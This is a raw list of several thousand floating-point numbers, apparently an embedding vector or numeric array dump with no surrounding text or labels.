-0.005154844839125872, 0.016315024346113205, -0.028349649161100388, -0.009590965695679188, 0.004799475893378258, -0.022919293493032455, -0.012601618655025959, 0.0037034223787486553, -0.016450783237814903, 0.02256791852414608, 0.01470987405627966, 0.010445448569953442, 0.004062784370034933, -0.004352270159870386, 0.006508440710604191, -0.003935011103749275, -0.00921563245356083, 0.026209451258182526, -0.011707207188010216, -0.028094103559851646, -0.00373736210167408, 0.01739310845732689, -0.007446774281561375, 0.02456437237560749, -0.01024580281227827, 0.03941798955202103, -0.027726756408810616, -0.013336313888430595, -0.008353164419531822, 0.0024975640699267387, -0.0293718334287405, 0.0009328431915491819, 0.006728050764650106, 0.018590981140732765, -0.007191227748990059, 0.03082525171339512, 0.006787944119423628, -0.0009148751269094646, -0.006149078719317913, -0.02152976207435131, -0.003116464940831065, -0.0002889867464546114, 0.017217420041561127, 0.006504447665065527, -0.004983149468898773, 0.016562582924962044, 0.006033284589648247, 0.0022619825322180986, -0.010213859379291534, -0.007207199465483427, -0.009646866470575333, 0.005614029243588448, 0.01857500895857811, -0.01431856956332922, -0.010796824470162392, 0.012881122529506683, 0.015340753830969334, -0.019740939140319824, -0.018415292724967003, -0.031400229781866074, -0.020763123407959938, 0.013751576654613018, 0.02504352107644081, -0.035968117415905, 0.01059717871248722, 0.02582613192498684, 0.001757877878844738, -0.030058614909648895, 0.027024004608392715, 0.009399306029081345, 0.024292854592204094, 0.014126909896731377, 0.009606937877833843, 0.006204979494214058, 0.010030185803771019, -0.0030925075989216566, 0.03159189224243164, -0.00494721345603466, -0.0034259152598679066, -0.009590965695679188, -0.021258244290947914, 0.04280397668480873, 0.008904185146093369, 0.000031210194720188156, 0.008001788519322872, -0.023334557190537453, 0.008776412345468998, -0.002192106796428561, 0.0129290372133255, 0.01705770380795002, 0.01024580281227827, -0.055325739085674286, 0.01857500895857811, 0.01919790357351303, 0.00599335553124547, -0.023286640644073486, 0.025842102244496346, -0.016402866691350937, -0.010149973444640636, 0.021481847390532494, -0.005813674535602331, 0.011028412729501724, 0.0069556464441120625, -0.025075463578104973, 0.004376227501779795, 0.022264456376433372, 0.010373575612902641, -0.037501394748687744, -0.03138425946235657, 0.002537493361160159, 0.007989809848368168, -0.0024855853989720345, -0.01621120795607567, -0.002864911686629057, 0.01601954735815525, 0.0032542203553020954, 0.0000014037568689673208, -0.011068342253565788, 0.01605149172246456, -0.015197008848190308, -0.004024851601570845, 0.007985816337168217, 0.004408170934766531, -0.0046437522396445274, 0.005661943927407265, -0.0034259152598679066, 0.005306574981659651, 0.005829646252095699, -0.03366820141673088, 0.019293732941150665, 0.0066002774983644485, 0.03443484008312225, -0.01902221515774727, 0.002299915300682187, 0.012992924079298973, -0.025251151993870735, -0.0108207818120718, -0.01694590225815773, 0.004046812653541565, 0.0011489593889564276, -0.012721406295895576, -0.008233376778662205, -0.007530624978244305, 0.0022100748028606176, 0.008824327029287815, -0.03814025968313217, -0.029467662796378136, 0.010173930786550045, -0.00268722721375525, 0.004312341101467609, 0.0017468973528593779, -0.006484483368694782, -0.003962961491197348, -0.01646675355732441, 0.02271166257560253, -0.009798597544431686, -0.010086086578667164, -0.044688630849123, -0.014142881147563457, -0.008321220986545086, 0.0013995143817737699, 0.008021753281354904, 0.001459407969377935, 0.00019727462495211512, -0.018559038639068604, 0.02279152162373066, 0.01541262585669756, -0.030585678294301033, -0.0023638017009943724, 0.018447237089276314, -0.024580344557762146, -0.015564356930553913, 0.012122469954192638, 0.004843397997319698, -0.01815974712371826, -0.03430707007646561, -0.018143774941563606, 0.0033061280846595764, 0.005562121514230967, 0.0032562166452407837, 0.0063527170568704605, -0.009431249462068081, -0.019118044525384903, -0.002295922255143523, -0.014222739264369011, -0.00027850535116158426, 0.005458305589854717, 0.00921563245356083, -0.017073675990104675, 0.011108270846307278, 0.010014214552938938, 0.014214754104614258, -0.0028948585968464613, 0.0030386033467948437, 0.009327434003353119, -0.006480490323156118, -0.0058975256979465485, -0.01178706530481577, -0.03679864481091499, -0.0022579897195100784, 0.046605225652456284, -0.0061450861394405365, -0.020922839641571045, 0.032837677747011185, -0.010413505136966705, 0.003563670674338937, -0.006512433290481567, -0.002815000480040908, 0.009279519319534302, 0.005534171126782894, 0.008832313120365143, -0.013871363364160061, 0.023222755640745163, -0.007945887744426727, 0.0007985816919244826, -0.008560795336961746, -0.010014214552938938, -0.01202663965523243, 0.0012717413483187556, -0.0034818160347640514, 0.002950759371742606, 0.05960613489151001, 0.0362556092441082, -0.02534698136150837, -0.0057218377478420734, -0.014326554723083973, -0.019437476992607117, 0.005813674535602331, -0.01590774767100811, -0.0005385435069911182, -0.0037293764762580395, -0.017920171841979027, -0.01983676850795746, -0.027471208944916725, 0.009375348687171936, 0.007654405198991299, 0.006783951073884964, 0.029627379029989243, -0.017888229340314865, -0.007997795008122921, 0.005977383814752102, 0.028589224442839622, 0.012529746629297733, -0.007702320348471403, -0.019341647624969482, -0.0018906421028077602, 0.016706328839063644, -0.0167223010212183, 0.007514653727412224, -0.004775518551468849, 0.0014843636890873313, 0.002978709526360035, -0.004679688718169928, 0.0014723849017173052, -0.0005026073195040226, -0.00017893221229314804, -0.0037213906180113554, -0.01328041311353445, -0.03274184837937355, 0.0002862416149582714, 0.020811038091778755, -0.0054702842608094215, 0.0013795498525723815, 0.00804970320314169, -0.00210026977583766, -0.010573221370577812, -0.04155819118022919, -0.026289308443665504, -0.012641548179090023, -0.007051476277410984, 0.003042596159502864, 0.010453433729708195, 0.03347654268145561, 0.022520003840327263, -0.015212981030344963, -0.0022020889446139336, 0.028764910995960236, -0.022967208176851273, -0.018511123955249786, 0.022967208176851273, -0.037054188549518585, 0.008425036445260048, 0.0018666846444830298, 0.000381821853807196, 0.01871875487267971, -0.010716966353356838, 0.025171294808387756, 0.013360271230340004, 0.002505549928173423, -0.015101179480552673, -0.014901533722877502, -0.0007751233060844243, -0.0010411508847028017, 0.01835140585899353, 0.013408185914158821, 0.009662838652729988, -0.0005140869761817157, -0.00478350417688489, 0.006484483368694782, -0.022072797641158104, -0.0019136012997478247, -0.02160961925983429, -0.004743575118482113, 0.033795975148677826, -0.009942341595888138, -0.030218331143260002, -0.02453242801129818, 0.026241393759846687, 0.011539504863321781, -0.008664610795676708, -0.0016700339037925005, 0.007602497469633818, 0.04190956428647041, -0.011691235937178135, 0.0030386033467948437, 0.011307916603982449, 0.015692129731178284, -0.03325293958187103, 0.000410520879086107, 0.023813705891370773, -0.022488059476017952, -0.005889539606869221, -0.007917936891317368, 0.000052562896598828956, 0.005019085947424173, 0.002443659817799926, -0.02411716617643833, -0.0323265865445137, -0.004312341101467609, -0.0006533396081067622, 0.021034641191363335, 0.010788838379085064, 0.014086980372667313, 0.028541309759020805, 0.018846526741981506, 0.011930810287594795, -0.005063007585704327, 0.015420611947774887, -0.016179265454411507, 0.0027710783760994673, 0.009998242370784283, -0.011084313504397869, -0.013312356546521187, 0.018479179590940475, 0.016514668241143227, 0.010325660929083824, -0.001696986029855907, -0.037054188549518585, 0.03277379274368286, -0.01705770380795002, 0.024883804842829704, -0.00993435550481081, -0.0060532488860189915, -0.008816341869533062, -0.005657951347529888, 0.0016101403161883354, 0.00012696201156359166, 0.03529730811715126, -0.0008135550888255239, -0.01849515177309513, 0.01272939145565033, 0.009814568795263767, 0.0068318662233650684, -0.040536005049943924, -0.020028429105877876, -0.01790420152246952, 0.013887335546314716, -0.005737809464335442, -0.012976951897144318, 0.0115235336124897, -0.01389532070606947, 0.00952707976102829, 0.008720511570572853, -0.0007691339706070721, 0.008744468912482262, -0.009598951786756516, 0.0044121635146439075, -0.010086086578667164, -0.03992908447980881, 0.015093193389475346, 0.008165497332811356, -0.01110028475522995, -0.008153518661856651, 0.00739885913208127, 0.002928798319771886, -0.019469421356916428, -0.01420676801353693, -0.005370461847633123, -0.016179265454411507, -0.012833207845687866, 0.01902221515774727, -0.007502674590796232, 0.006484483368694782, 0.010078100487589836, -0.007215185556560755, -0.0011529523180797696, -0.006368688773363829, -0.0026313266716897488, -0.01950136385858059, 0.015404640696942806, 0.01768059842288494, -0.01420676801353693, 0.005985369440168142, -0.0019734948873519897, 0.02619347907602787, 0.006480490323156118, 0.004376227501779795, 0.008385107852518559, -0.008409065194427967, -0.0167223010212183, 0.009247575886547565, -0.01143568940460682, 0.010333647020161152, 0.015420611947774887, 0.023286640644073486, -0.022328343242406845, -0.007905958220362663, -0.019181931391358376, 0.01894235797226429, -0.00003496914359857328, 0.01455814391374588, 0.016307037323713303, -0.007350944448262453, -0.014757789671421051, -0.003104486269876361, 0.02563447132706642, -0.014174824580550194, 0.005853603594005108, 0.011978724971413612, -0.011188128963112831, 0.006432575173676014, -0.010796824470162392, 0.005777738522738218, 0.00424446165561676, 0.016195235773921013, -0.005426362622529268, -0.009415278211236, -0.0008130559581331909, 0.015348739922046661, 0.008117582648992538, 0.008936128579080105, -0.00802574586123228, 0.0002702699857763946, 0.005965405143797398, 0.007386880461126566, -0.0003571157285477966, -0.0030006705783307552, 0.009870469570159912, -0.0062289368361234665, -0.01908610202372074, 0.0005964406882412732, 0.019517336040735245, -0.0230470672249794, 0.004887319635599852, -0.011595405638217926, 0.008433022536337376, 0.003939004149287939, 0.00033640253241173923, -0.011451661586761475, -0.009175702929496765, 0.007239142898470163, 0.008688568137586117, -0.0018357395892962813, -0.02945169247686863, -0.01990065537393093, 0.012010668404400349, 0.020842982456088066, -0.0036095890682190657, -0.006995575502514839, -0.023765791207551956, -0.002359808888286352, 0.00041126954602077603, -0.0027251599822193384, -0.009535064920783043, 0.004112695809453726, -0.018622923642396927, 0.034530673176050186, -0.013352285139262676, -0.016418838873505592, -0.015955662354826927, -0.008784398436546326, -0.009974285028874874, -0.005913497414439917, 0.022184599190950394, -0.0002315886813448742, -0.008157512173056602, 0.011723178438842297, -0.023669959977269173, -0.00806567445397377, 0.008912171237170696, 0.0016650428296998143, -0.0035277344286441803, -0.021801279857754707, -0.01213844120502472, 0.003459854982793331, 0.00588155398145318, -0.022024882957339287, -0.0018507130444049835, 0.004999121185392141, -0.0007077429909259081, 0.00739885913208127, 0.002457635011523962, 0.025187265127897263, 0.017409080639481544, 0.012433916330337524, -0.0030386033467948437, 0.0013645763974636793, -0.007023525889962912, 0.021449903026223183, -0.02275957725942135, -0.0032562166452407837, -0.015716087073087692, -0.017329221591353416, -0.0018916403641924262, -0.0020323903299868107, 0.015404640696942806, 0.01986871100962162, -0.02200891077518463, 0.02782258577644825, -0.011020426638424397, 0.017265336588025093, 0.004400184843689203, -0.022887350991368294, -0.025905989110469818, -0.009087859652936459, -0.016738271340727806, 0.002934787655249238, -0.0008989034686237574, -0.01790420152246952, 0.0007666383753530681, -0.010541277937591076, 0.023622045293450356, -0.0365430973470211, 0.023877592757344246, 0.012665505520999432, -0.0014504239661619067, -0.02557058446109295, 0.005494242068380117, 0.007299036253243685, 0.01272939145565033, 0.0062289368361234665, 0.017552824690937996, 0.012521760538220406, 0.005202759522944689, -0.0054103909060359, 0.0061969938687980175, 0.0038511601742357016, -0.006532398052513599, 0.013488044030964375, -0.02065132185816765, -0.01731325127184391, 0.01211448386311531, 0.008632668294012547, -0.009830540046095848, -0.0043083480559289455, -0.016706328839063644, -0.0032642025034874678, -0.0015452555380761623, -0.02290332317352295, -0.03141620382666588, 0.015588314272463322, -0.018846526741981506, 0.0018067910568788648, 0.0044840360060334206, 0.01455814391374588, -0.0033899792470037937, -0.01272939145565033, -0.025618499144911766, 0.009295490570366383, 0.007590518798679113, 0.012090526521205902, 0.0013416172005236149, -0.0058256532065570354, -0.0008529850165359676, -0.004136653151363134, -0.0014464310370385647, -0.00014287125668488443, 0.004424142651259899, -0.010301703587174416, -0.015516442246735096, -0.007207199465483427, -0.004999121185392141, -0.023110954090952873, -0.00762246223166585, -0.026129592210054398, -0.00004389079549582675, 0.0007930914289318025, -0.01213844120502472, 0.012042611837387085, 0.04213316738605499, 0.004092731047421694, 0.009670823812484741, -0.0000613597730989568, 0.012537731789052486, 0.005725830793380737, -0.0008704540086910129, -0.0016061473870649934, 0.01694590225815773, 0.0008464965503662825, 0.002172142034396529, 0.009606937877833843, 0.01221031416207552, -0.011339860036969185, 0.008281291462481022, 0.005546149797737598, -0.004615801852196455, -0.00340794725343585, 0.02101866900920868, 0.007151298690587282, 0.020220087841153145, 0.025522669777274132, -0.00837712176144123, -0.007211192511022091, -0.006660171318799257, -0.005709859076887369, 0.0026253373362123966, -0.008085639216005802, -0.005562121514230967, -0.010900639928877354, -0.0015532413963228464, -0.00810959655791521, 0.009151745587587357, -0.0018646882381290197, -0.013088753446936607, 0.0003693440230563283, -0.014765774831175804, -0.006153071764856577, -0.0012777306837961078, -0.01843126490712166, -0.0040607876144349575, -0.009519093669950962, 0.025506697595119476, 0.02456437237560749, -0.005757773760706186, -0.0022020889446139336, -0.0483301617205143, -0.010812795720994473, 0.012090526521205902, 0.001766861998476088, -0.006819887552410364, 0.02363801747560501, -0.007678362540900707, -0.020523548126220703, 0.0067040929570794106, 0.002327865455299616, 0.003970947116613388, 0.008217405527830124, -0.0023098974488675594, 0.002397741423919797, -0.008816341869533062, 0.020555492490530014, -0.011267987079918385, -0.0008370134164579213, 0.025315038859844208, -0.015811916440725327, 0.006592291872948408, -0.000411768676713109, -0.010022199712693691, 0.015516442246735096, -0.012290172278881073, -0.02493171952664852, 0.0047156247310340405, -0.009415278211236, -0.0022659755777567625, -0.011962753720581532, 0.010788838379085064, 0.008928143419325352, -0.004851383622735739, -0.017920171841979027, -0.00004981776874046773, 0.009710753336548805, 0.028477422893047333, 0.029100315645337105, -0.007921930402517319, -0.0000253612070082454, -0.006616249214857817, 0.0063008093275129795, -0.00907987356185913, -0.01779239997267723, -0.004260433372110128, 0.03385986387729645, -0.004428135231137276, 0.0009747687727212906, -0.005150851793587208, 0.011108270846307278, 0.004212518222630024, -0.00105213129427284, 0.002214067615568638, -0.020587434992194176, 0.009447220712900162, -0.022999152541160583, -0.006252894643694162, -0.014270654879510403, -0.0018956332933157682, 0.011371802538633347, -0.013240484520792961, -0.015771988779306412, 0.004000894259661436, 0.02034786157310009, -0.006524412427097559, 0.006137100048363209, 0.004500007722526789, 0.0002162409364245832, 0.024883804842829704, 0.00212223082780838, 0.005346504505723715, -0.005226716864854097, -0.006432575173676014, -0.0020273991394788027, -0.017121590673923492, -0.019581222906708717, -0.001693991362117231, 0.013408185914158821, -0.011515547521412373, 0.016929931938648224, 0.00258940109051764, -0.004799475893378258, -0.008608710020780563, 0.01351998746395111, -0.03360431641340256, 0.007151298690587282, -0.010221845470368862, -0.007582533173263073, -0.003879110561683774, 0.025251151993870735, -0.013551930896937847, -0.016818130388855934, -0.005801695864647627, 0.017520882189273834, 0.008017759770154953, -0.008441008627414703, -0.014869590289890766, -0.0008724504732526839, 0.010653079487383366, -0.009495136328041553, -0.008896199986338615, -0.007674369961023331, 0.0024915747344493866, 0.007087412290275097, -0.02208876982331276, -0.00980658270418644, -0.043378956615924835, -0.02464422956109047, 0.005322546698153019, 0.018175719305872917, 0.025075463578104973, 0.010716966353356838, 0.002124227350577712, -0.003575649345293641, 0.009247575886547565, -0.0086406534537673, -0.005031064618378878, -0.0193895623087883, 0.02700803242623806, -0.01930970512330532, 0.004020858556032181, 0.005482262931764126, 0.015125136822462082, 0.035201478749513626, 0.0046118092723190784, 0.02275957725942135, -0.02664068527519703, -0.008824327029287815, -0.0000737440277589485, 0.006185015197843313, -0.032023124396800995, -0.007570554036647081, -0.003587628249078989, 0.0006154070142656565, -0.0167223010212183, -0.009974285028874874, 0.0070594619028270245, -0.007267093285918236, -0.005729823373258114, -0.015771988779306412, -0.0007910949643701315, -0.023286640644073486, -0.0039010713808238506, -0.000936836120672524, 0.010293717496097088, -0.0207950659096241, -0.0005580089637078345, 0.02119435742497444, -0.00043722346890717745, -0.001820766250602901, -0.028221875429153442, -0.012298157438635826, -0.011515547521412373, 0.004192553926259279, -0.030697479844093323, 0.006668156944215298, 0.004531951155513525, -0.01683410070836544, -0.0003638537600636482, 0.004348277114331722, -0.0000520637804584112, -0.005558128468692303, -0.029068373143672943, -0.014063023030757904, -0.007690341677516699, 0.012753348797559738, 0.01972496695816517, 0.013096739538013935, -0.004016865976154804, 0.006983596831560135, -0.00502307852730155, -0.009247575886547565, -0.014606058597564697, -0.008069667965173721, 0.002176135079935193, 0.011419718153774738, -0.010110043920576572, -0.012473845854401588, 0.026065705344080925, 0.00810959655791521, -0.00401287293061614, -0.010716966353356838, -0.018031973391771317, -0.05628403648734093, 0.009383334778249264, 0.01257766131311655, 0.005801695864647627, -0.004460078664124012, -0.000008360151696251705, 0.004859369248151779, -0.010333647020161152, 0.0167223010212183, -0.005538163706660271, 0.0008859265362843871, -0.0390666164457798, -0.004531951155513525, -0.00564197963103652, -0.005889539606869221, 0.023302612826228142, 0.02481991797685623, 0.005110922735184431, 0.00408873800188303, -0.010892653837800026, -0.003749341005459428, -0.0018507130444049835, -0.021657533943653107, 0.010589192621409893, -0.0030246281530708075, 0.01831946335732937, -0.016147321090102196, 0.02282346412539482, 0.02430882677435875, -0.0011269983369857073, 0.009431249462068081, 0.010293717496097088, 0.023813705891370773, 0.012330100871622562, 0.013016881421208382, 0.003401957917958498, 0.0007491694414056838, 0.0008614699472673237, 0.0020124258007854223, -0.018335435539484024, -0.011691235937178135, 0.021992938593029976, 0.0061131427064538, -0.0040807523764669895, -0.010605164803564548, 0.0023358513135463, 0.009135774336755276, -0.0195333082228899, 0.01801600307226181, 0.005909504368901253, 0.0008015763596631587, -0.012074555270373821, 0.021210329607129097, -0.0031284436117857695, 0.014925491064786911, 0.0018547059735283256, -0.02534698136150837, 0.018846526741981506, 0.008656625635921955, -0.016434811055660248, -0.003156393999233842, -0.022280428558588028, -0.0000994483707472682, -0.010333647020161152, 0.0043283128179609776, -0.013935250230133533, -0.00490329135209322, -0.01835140585899353, 0.009015986695885658, -0.009319447912275791, 0.010285732336342335, 0.0051388731226325035, 0.005019085947424173, -0.009495136328041553, 0.0001147961156675592, -0.008552809245884418, -0.015548384748399258, -0.026209451258182526, -0.008944114670157433, 0.007997795008122921, 0.029739180579781532, -0.015228952281177044, -0.015316796489059925, 0.0004519473004620522, 0.02259986102581024, 0.01860695332288742, 0.004667710047215223, 0.01843126490712166, -0.0279663298279047, -0.010980498045682907, -0.010134001262485981, 0.019932597875595093, 0.005582085810601711, -0.00444011390209198, 0.006312787998467684, -0.013903306797146797, 0.011004455387592316, -0.0004187562735751271, -0.0006039274157956243, -0.00956700835376978, -0.028142018243670464, 0.009559022262692451, -0.03459455817937851, -0.007774192374199629, -0.005909504368901253, -0.007187235169112682, 0.0028948585968464613, -0.0009607935789972544, -0.003577645868062973, 0.002178131602704525, 0.02549072727560997, -0.008185462094843388, -0.009015986695885658, 0.00610515708103776, 0.02715177647769451, -0.0036794650368392467, 0.02427688241004944, 0.0032741848845034838, 0.022999152541160583, -0.011004455387592316, -0.007223171181976795, -0.03929021954536438, 0.007346951402723789, -0.01998051255941391, -0.004699653014540672, -0.013096739538013935, 0.013112710788846016, -0.015085207298398018, 0.005430355202406645, 0.013208541087806225, 0.0018367378506809473, -0.007634440902620554, 0.00046192959416657686, -0.0014853619504719973, -0.013687689788639545, -0.004659723956137896, 0.027359407395124435, -0.0016301048453897238, -0.010030185803771019, 0.009622909128665924, 0.0038990750908851624, -0.007921930402517319, -0.020220087841153145, -0.00011629345681285486, 0.013751576654613018, 0.006624234840273857, -0.008832313120365143, -0.006009327247738838, 0.010493363253772259, -0.035169538110494614, 0.018734725192189217, -0.00956700835376978, 0.0022480073384940624, 0.004919263068586588, -0.014055036939680576, 0.02360607497394085, 0.01389532070606947, 0.016059476882219315, 0.007450766861438751, -0.003579642390832305, -0.011267987079918385, 0.006959639023989439, 0.010094072669744492, -0.011419718153774738, -0.018750697374343872, 0.03398763760924339, 0.003282170742750168, -0.013567902147769928, -0.017600739374756813, 0.007227164227515459, -0.0015472519444301724, -0.0016540623037144542, -0.010038171894848347, 0.017632683739066124, -0.03491399064660072, -0.02641708217561245, 0.0014693902339786291, -0.009686795994639397, -0.003002667101100087, 0.002695213072001934, -0.011890880763530731, 0.008568781428039074, -0.019549278542399406, -0.012952994555234909, -0.007905958220362663, -0.008225391618907452, 0.0031983195804059505, -0.007099390961229801, 0.011834979988634586, -0.011930810287594795, -0.026880258694291115, 0.010285732336342335, 0.00008697053272044286, 0.015572342090308666, -0.00317236571572721, 0.00001848279862315394, -0.002645301865413785, -0.01354394480586052, -0.026816371828317642, -0.00548625597730279, 0.01638689637184143, -0.00435626320540905, -0.020523548126220703, 0.0005585080361925066, 0.018862498924136162, 0.0027810607571154833, 0.02430882677435875, -0.011667278595268726, 0.013591860421001911, 0.017377136275172234, 0.017744485288858414, 0.015540399588644505, -0.011850952170789242, 0.02031591720879078, 0.0011509557953104377, -0.007893979549407959, -0.019565250724554062, 0.005126894451677799, 0.0012557696318253875, 0.007303029298782349, 0.004344284068793058, -0.01902221515774727, -0.020523548126220703, -0.0018047945341095328, 0.008512880653142929, 0.011978724971413612, -0.011970738880336285, -0.006592291872948408, -0.0038950820453464985, 0.0024855853989720345, -0.00037807851913385093, 0.003525738138705492, -0.014031079597771168, -0.013464086689054966, -0.012090526521205902, -0.0014953442150726914, -0.007187235169112682, -0.0004162607074249536, -0.015971632674336433, -0.015420611947774887, 0.00412467448040843, -0.016346966847777367, -0.0016330995131283998, -0.025171294808387756, 0.005630000960081816, -0.002421698998659849, 0.00026178505504503846, -0.003346057143062353, -0.003563670674338937, -0.001929572899825871, 0.00895210076123476, -0.008872242644429207, -0.011659292504191399, -0.034498728811740875, -0.033572372049093246, 0.014462313614785671, 0.0025614507030695677, -0.01975691132247448, 0.006276851985603571, -0.0035277344286441803, -0.0047156247310340405, -0.010062129236757755, 0.007522639352828264, -0.0018057927954941988, 0.0010371579555794597, 0.009503121487796307, -0.028812827542424202, 0.003647521836683154, -0.004775518551468849, -0.010533291846513748, 0.006680135615170002, 0.007342958357185125, -0.027662869542837143, 0.008544824086129665, 0.007043490186333656, 0.001056124223396182, 0.0034239189699292183, 0.022663747891783714, -0.019804826006293297, 0.00775023503229022, 0.03293350711464882, -0.012952994555234909, 0.008085639216005802, -0.003561674151569605, -0.016674384474754333, 0.015292839147150517, 0.00976665411144495, 0.0029567487072199583, -0.006412610877305269, 0.0009722731774672866, -0.0186868105083704, -0.000017079040844691917, 0.014606058597564697, -0.0012148423120379448, -0.008085639216005802, 0.00930347666144371, 0.008297263644635677, -0.0025454789865761995, -0.011771094053983688, 0.007690341677516699, 0.010605164803564548, 0.012306143529713154, -0.007790164090692997, -0.015660187229514122, 0.01568414457142353, 0.0007292049122042954, -0.010637108236551285, -0.007905958220362663, 0.005482262931764126, -0.0038351884577423334, 0.012282186187803745, 0.0016800161683931947, -0.004216511268168688, -0.026512911543250084, -0.0071113696321845055, 0.015660187229514122, 0.002401734469458461, -0.02630528062582016, -0.000176810979610309, 0.0003646024561021477, 0.022839436307549477, -0.004687674343585968, 0.003525738138705492, 0.02231237106025219, 0.0033580358140170574, -0.0030226316303014755, -0.01986871100962162, 0.013224512338638306, 0.0068837739527225494, 0.010844739153981209, -0.004504000768065453, 0.0064764972776174545, -0.007466738577932119, 0.007171263452619314, -0.010852725245058537, 0.0037173975724726915, -0.018415292724967003, 0.006616249214857817, -0.004955199081450701, 0.012274200096726418, 0.0150372926145792, -0.012897093780338764, -0.01831946335732937, -0.023989392444491386, 0.011515547521412373, -0.01708964817225933, -0.00039529791683889925, -0.008393093012273312, -0.008960085920989513, 0.009854497388005257, 0.007366915699094534, 0.03861941024661064, 0.0073389653116464615, -0.012968966737389565, 0.0030226316303014755, 0.014733831398189068, 0.005162830464541912, 0.0015941685996949673, 0.020156200975179672, -0.00387511751614511, 0.01361581776291132, -0.009039944037795067, -0.011659292504191399, 0.019772881641983986, -0.004128667060285807, 0.0031883371993899345, -0.009814568795263767, 0.009630895219743252, 0.018063917756080627, 0.012370030395686626, 0.010165944695472717, 0.0207950659096241, -0.009942341595888138, 0.004847390577197075, 0.006879780907183886, -0.02053952030837536, -0.002751113846898079, 0.003108479082584381, -0.01378351915627718, -0.013959207572042942, -0.01779239997267723, 0.016011562198400497, -0.004312341101467609, -0.0021421953570097685, 0.007626454811543226, -0.02493171952664852, -0.017441023141145706, -0.0023198798298835754, 0.004683681298047304, -0.00420053955167532, 0.0007821109029464424, 0.0008704540086910129, -0.0050869653932750225, 0.02489977702498436, 0.031064826995134354, -0.017664626240730286, 0.00028973541338928044, -0.00002712370223889593, 0.0038890927098691463, 0.008736483752727509, 0.0015502466121688485, -0.012354058213531971, -0.002519525121897459, 0.006500454619526863, -0.009814568795263767, -0.013408185914158821, -0.004078756086528301, -0.001869679312221706, 0.009678809903562069, 0.012306143529713154, 0.011547490954399109, 0.008353164419531822, 0.003769305534660816, 0.02481991797685623, -0.008592738769948483, 0.008592738769948483, -0.026960117742419243, 0.008480937220156193, -0.013464086689054966, -0.007977831177413464, 0.001295698806643486, -0.0003146910748910159, -0.025842102244496346, -0.01739310845732689, -0.023174840956926346, -0.00198447541333735, 0.01761671155691147, 0.0062289368361234665, 0.0038950820453464985, 0.011659292504191399, -0.007011547219008207, 0.01616329327225685, 0.0006997571908868849, -0.005055021960288286, 0.004543929826468229, 0.012481831945478916, -0.011156185530126095, -0.01761671155691147, 0.0015023318119347095, 0.007566561456769705, 0.0165785551071167, -0.02863713912665844, 0.006963632069528103, 0.0004277403058949858, 0.0351375937461853, -0.030761366710066795, 0.0023837662301957607, 0.013911292888224125, -0.04871348291635513, -0.01764865405857563, -0.016418838873505592, -0.0006119132158346474, 0.022264456376433372, 0.009247575886547565, 0.02501157857477665, 0.01343214325606823, 0.0053864335641264915, 0.02020411565899849, 0.0029168196488171816, -0.022504031658172607, -0.00564996525645256, 0.011339860036969185, -0.011723178438842297, 0.006524412427097559, -0.006296816281974316, -0.009199661202728748, -0.005853603594005108, -0.014845632947981358, 0.004699653014540672, -0.002972720190882683, 0.005985369440168142, 0.02116241492331028, -0.011307916603982449, 0.00014873583859298378, 0.020747151225805283, 0.002421698998659849, -0.014534186571836472, 0.005757773760706186, 0.016626469790935516, -0.0027271565049886703, -0.004332305397838354, -0.0014314576983451843, 0.010637108236551285, 0.01280126441270113, -0.004316334147006273, -0.016738271340727806, 0.0012098512379452586, -0.031767576932907104, 0.004292376339435577, 0.0063527170568704605, 0.012881122529506683, 0.016642441973090172, 0.013488044030964375, -0.013975178822875023, -0.008704540319740772, -0.028796855360269547, -0.0033101211301982403, -0.0058775609359145164, 0.0157400444149971, -0.003861142322421074, -0.009742696769535542, -0.01846320740878582, 0.005390426144003868, -0.005342511460185051, -0.0108207818120718, 0.0013835427816957235, -0.01983676850795746, 0.012306143529713154, 0.002166152698919177, 0.00455191545188427, -0.004032837226986885, 0.007470731623470783, 0.022152654826641083, -0.041526246815919876, -0.01163533516228199, 0.00008123072620946914, 0.007043490186333656, -0.0058456179685890675, 0.0077103059738874435, 0.014661959372460842, 0.004527958109974861, 0.0046637170016765594, 0.015556370839476585, -0.007434795144945383, -0.010070114396512508, 0.006592291872948408, 0.021881137043237686, -0.01756879687309265, 0.009606937877833843, 0.00186868105083704, 0.0003910554514732212, 0.004300362430512905, 0.004384213592857122, 0.011252015829086304, -0.006759993731975555, -0.011419718153774738, -0.0017458992078900337, -0.005306574981659651, 0.02327067032456398, 0.00045444286661222577, 0.010916611179709435, -0.031687721610069275, -0.007139320019632578, 0.01550047006458044, 0.017824342474341393, -0.0025335003156214952, 0.022040853276848793, -0.013671718537807465, -0.043634504079818726, -0.008073660545051098, -0.009159731678664684, 0.014757789671421051, -0.00034962903009727597, 0.0003750838222913444, -0.02523517981171608, -0.023110954090952873, 0.002565443515777588, 0.0004187562735751271, -0.003935011103749275, -0.009383334778249264, 0.028173960745334625, -0.002337847836315632, -0.005246681626886129, 0.012721406295895576, -0.01035760436207056, 0.01537269726395607, -0.0014314576983451843, -0.01761671155691147, 0.0200923141092062, 0.00875245500355959, -0.005306574981659651, -0.005534171126782894, -0.03411540761590004, 0.00716727040708065, -0.0037673090118914843, 0.01633099466562271, -0.0028609188739210367, 0.004531951155513525, 0.007686348631978035, 0.0013306366745382547, 0.0037034223787486553, 0.0033260926138609648, 0.007350944448262453, -0.011890880763530731, -0.006440561264753342, 0.03740556538105011, -0.004240468610078096, 0.017968088388442993, 0.016179265454411507, -0.011699221096932888, 0.005578092765063047, 0.003054574830457568, 0.011108270846307278, 0.006728050764650106, -0.011307916603982449, -0.013935250230133533, -0.002811007434502244, 0.0007127341232262552, -0.005282617639750242, 0.006436568219214678, 0.020044399425387383, 0.013911292888224125, -0.0012707430869340897, 0.016227180138230324, 0.009942341595888138, -0.005434348247945309, -0.006412610877305269, 0.01927776075899601, -0.010014214552938938, -0.008536837995052338, -0.014917505905032158, -0.01104438491165638, 0.0033181067556142807, -0.010110043920576572, -0.008960085920989513, 0.03256615996360779, 0.013352285139262676, -0.006692114286124706, 0.007315007969737053, -0.007614476140588522, 0.002767085563391447, 0.01649869792163372, 0.022072797641158104, -0.001225822838023305, 0.00455191545188427, 0.01731325127184391, -0.014126909896731377, -0.010277746245265007, 0.010189902037382126, 0.012250242754817009, -0.015316796489059925, -0.02981903962790966, -0.008053695783019066, -0.01211448386311531, -0.010341632179915905, 0.002174138557165861, -0.012968966737389565, -0.0018297502538189292, -0.007690341677516699, 0.00444011390209198, 0.004020858556032181, 0.011267987079918385, -0.013160625472664833, 0.015716087073087692, -0.004046812653541565, 0.002359808888286352, 0.020060371607542038, 0.04775518551468849, -0.02604973316192627, 0.01779239997267723, 0.014813689514994621, 0.021226299926638603, -0.01315264031291008, -0.014526200480759144, -0.004324319772422314, 